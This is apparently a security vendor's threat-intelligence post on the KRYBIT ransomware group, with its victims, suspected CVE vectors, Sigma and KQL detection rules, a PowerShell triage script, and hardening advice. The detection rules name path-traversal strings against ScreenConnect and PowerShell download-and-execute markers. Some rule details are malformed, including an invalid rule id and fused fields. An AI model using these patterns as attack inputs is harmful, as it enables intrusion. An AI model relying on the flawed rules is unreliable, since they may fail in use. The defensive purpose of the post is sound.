Back to Intelligence

KRYBIT Ransomware Gang: 11 New Victims Posted — Perimeter Breach Analysis & Detection Rules

SA
Security Arsenal Team
July 3, 2026
6 min read

Aliases & Classification: KRYBIT appears to operate as a Ransomware-as-a-Service (RaaS) entity, given the rapid cadence of victim postings (11 in 3 days) and the diverse geographic footprint spanning North America, Europe, Asia, and the Middle East.

Operational Model: They utilize a double-extortion model, exfiltrating sensitive data prior to encryption to leverage pressure on victims. The group typically demands mid-range to high ransoms, calibrated based on victim revenue and the criticality of exfiltrated data (intellectual property for tech firms, operational data for logistics).

Initial Access Vectors: Intelligence indicates KRYBIT aggressively exploits internet-facing infrastructure. Recent activity correlates strongly with CISA KEV-listed vulnerabilities, specifically targeting VPN gateways (Check Point), remote management tools (ConnectWise ScreenConnect), and firewall management interfaces (Cisco FMC). They also leverage phishing with macro-laden documents as a secondary vector.

Dwell Time: Observations suggest a dwell time of approximately 3–7 days. The group moves quickly from initial access to lateral movement, often staging data immediately after establishing a foothold to minimize detection by EDR solutions.

Current Campaign Analysis

Sector Targeting: The current campaign (July 2026) shows a distinct pivot towards the Technology sector (4 victims) and Transportation/Logistics (2 victims). Secondary targets include Agriculture and Healthcare. This targeting suggests KRYBIT is actively hunting for high-value intellectual property (Tech) and time-sensitive operational data (Logistics) to maximize extortion leverage.

Geographic Spread: The operation is highly globalized, impacting:

  • Americas: US, MX, CA
  • Europe: ES, IT
  • Asia: TW, MY
  • Middle East: ME

Victim Profile: Based on the victim roster (e.g., majuhome.com.my, gsp.es, TRANSPORTES Y LOGISTICA BRAS), KRYBIT targets mid-to-large enterprises. These are likely organizations with $50M - $500M in revenue—large enough to pay significant ransoms but often lacking the mature 24/7 SOC capabilities of Fortune 100 firms.

Posting Frequency: The gang posted 2 victims on 2026-07-03 and 9 victims on 2026-07-01. This high velocity indicates an automated or highly efficient attack pipeline.

CVE Correlation: There is a high probability that the recent victims were compromised via the following CVEs currently listed in CISA's Known Exploited Vulnerabilities catalog:

  • CVE-2026-50751 (Check Point Security Gateway): Likely used for initial network perimeter bypass.
  • CVE-2024-1708 (ConnectWise ScreenConnect): A common vector for gaining remote code execution on internal systems.
  • CVE-2026-20131 (Cisco Secure Firewall FMC): Exploited to bypass or disable security controls during lateral movement.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Check Point IKEv1 Exploitation (CVE-2026-50751)
id: 3a9b1c8d-5e6f-4a2b-9c1d-8e7f6a5b4c3d
description: Detects signs of exploitation targeting the Check Point Security Gateway IKEv1 improper authentication vulnerability.status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  product: firewall
  service: check_point
detection:
  selection:
    product: 'VPN'
    action|contains: 'key_exchange'
    ike_version: '1'
    auth_method|contains: 'aggressive'
  condition: selection
falsepositives:
  - Legitimate IKEv1 VPN configuration from legacy clients
level: high
---
title: ConnectWise ScreenConnect Path Traversal Exploit (CVE-2024-1708)
id: b4c3d2e1-6f7a-4b5c-8d9e-0f1a2b3c4d5e
description: Detects path traversal attempts against ConnectWise ScreenConnect web server.status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  category: web
detection:
  selection:
    cs-uri-stem|endswith: '/Setup.aspx'
    cs-uri-query|contains:
      - '..%2f'
      - '..\\'
  condition: selection
falsepositives:
  - Rare; legitimate traffic should not use path traversal on Setup.aspx
level: critical
---
title: Suspicious PowerShell Process via ScreenConnect (KRYBIT TTP)
id: c5d4e3f2-7g8b-5c6d-9e0f-1g2h3i4j5k6l
description: Detects PowerShell execution spawned by ConnectWise ScreenConnect client, a common lateral movement technique for ransomware gangs.status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\ScreenConnect.ClientService.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - 'EncryptedData'
  condition: selection
falsepositives:
  - Administrative troubleshooting via ScreenConnect
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// KRYBIT Lateral Movement Hunt: Detecting unusual SMB/WMI activity
// Hunt for remote execution via WMI or SMB which often precedes encryption
DeviceProcessEvents
| where Timestamp > ago(3d)
| where InitiatingProcessFileName in ("wmiprvse.exe", "svchost.exe") 
| where FileName in ("powershell.exe", "cmd.exe", "rundll32.exe")
| where ProcessCommandLine has "-enc" or ProcessCommandLine has "Invoke-"
| extend HostName = DeviceName, Account = InitiatingProcessAccountName
| project Timestamp, HostName, Account, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

PowerShell Response Script

PowerShell
# KRYBIT Rapid Response: Persistence and Shadow Copy Check
# Run this on suspicious endpoints to identify common ransomware precursors.

Write-Host "[+] Checking for Scheduled Tasks created in last 48 hours..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddHours(-48)} | 
    Select-Object TaskName, Author, Date, Action | Format-Table -AutoSize

Write-Host "[+] Checking Volume Shadow Copy Service (VSS) Status..." -ForegroundColor Cyan
# Ransomware groups like KRYBIT often delete shadows prior to encryption
$vss = Get-WmiObject Win32_ShadowCopy | Sort-Object InstallDate -Descending | Select-Object -First 5
if ($vss.Count -eq 0) {
    Write-Host "[WARNING] No recent Volume Shadow Copies found. Possible deletion." -ForegroundColor Red
} else {
    $vss | Format-Table DeviceObject, InstallDate, VolumeName -AutoSize
}

Write-Host "[+] Checking for large outbound network connections (Data Exfil)..." -ForegroundColor Cyan
# Simple check for active ESTABLISHED connections on non-standard ports
Get-NetTCPConnection -State Established | 
    Where-Object {$_.LocalPort -ne 443 -and $_.LocalPort -ne 80 -and $_.RemoteAddress -notlike "127.*" -and $_.RemoteAddress -notlike "192.168.*"} | 
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess | Format-Table -AutoSize

Incident Response Priorities

T-Minus Detection Checklist:

  • VPN Logs: Immediately audit logs for Check Point gateways (CVE-2026-50751). Look for successful authentications followed by unusual RDP traffic from the same source IP.
  • RMM Sessions: Audit ConnectWise ScreenConnect logs for logins outside of business hours or from impossible travel locations.
  • Firewall Config Changes: Check Cisco FMC logs for unauthorized configuration changes or rule modifications (CVE-2026-20131).

Critical Assets for Exfiltration:

  • Tech Sector: Source code repositories, customer databases, SSH keys, and intellectual property.
  • Transportation/Logistics: Shipping manifests, logistics databases, supplier contracts, and operational schedules.

Containment Actions:

  1. Isolate: Disconnect VPN concentrators from the internal network if exploitation is suspected, but keep them running for forensic acquisition.
  2. Reset: Force a password reset for all privileged accounts and disable local admin accounts on servers.
  3. Block: Block IP addresses associated with the initial VPN/ScreenConnect access at the perimeter firewall.

Hardening Recommendations

Immediate (24h):

  • Patch Critical CVEs: Apply patches for CVE-2026-50751 (Check Point), CVE-2024-1708 (ConnectWise), and CVE-2026-20131 (Cisco FMC) immediately. If patching is not possible, apply vendor-provided mitigations (e.g., disabling IKEv1, restricting access to /Setup.aspx).
  • MFA Enforcement: Enforce Multi-Factor Authentication (MFA) on all VPN and RMM access points.

Short-term (2 weeks):

  • Network Segmentation: Implement strict segmentation to prevent VPN/RDM access from reaching Domain Controllers and critical backup servers directly.
  • Zero Trust for RMM: Implement a "Just-In-Time" access model for remote management tools, ensuring sessions are approved and recorded before initiation.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebransomware-gangkrybitransomwaretechnology-sectortransportationcisa-kevcve-exploitation

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.